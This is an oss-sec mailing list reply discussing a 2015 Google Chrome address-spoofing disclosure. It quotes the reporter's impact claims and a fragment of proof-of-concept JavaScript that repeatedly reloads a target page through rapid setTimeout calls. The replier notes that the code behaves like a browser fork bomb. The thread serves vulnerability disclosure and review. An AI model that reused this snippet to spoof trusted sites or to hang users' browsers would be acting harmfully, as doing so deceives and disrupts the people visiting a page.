oss-sec mailing list archives

Re: Google Chrome Address Spoofing (Request For Comment)


From: "Alexander E. Patrakov" <patrakov () gmail com>
Date: Tue, 30 Jun 2015 11:46:13 +0500

30.06.2015 11:08, David Leo wrote:
Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
function next()
{
     w.location.replace('http://www.oracle.com/index.html?'+n);n++;
     setTimeout("next();",15);
     setTimeout("next();",25);
}

Looks like a fork bomb to me. And I had to forcefully close Firefox after this.

--
Alexander E. Patrakov


Current thread: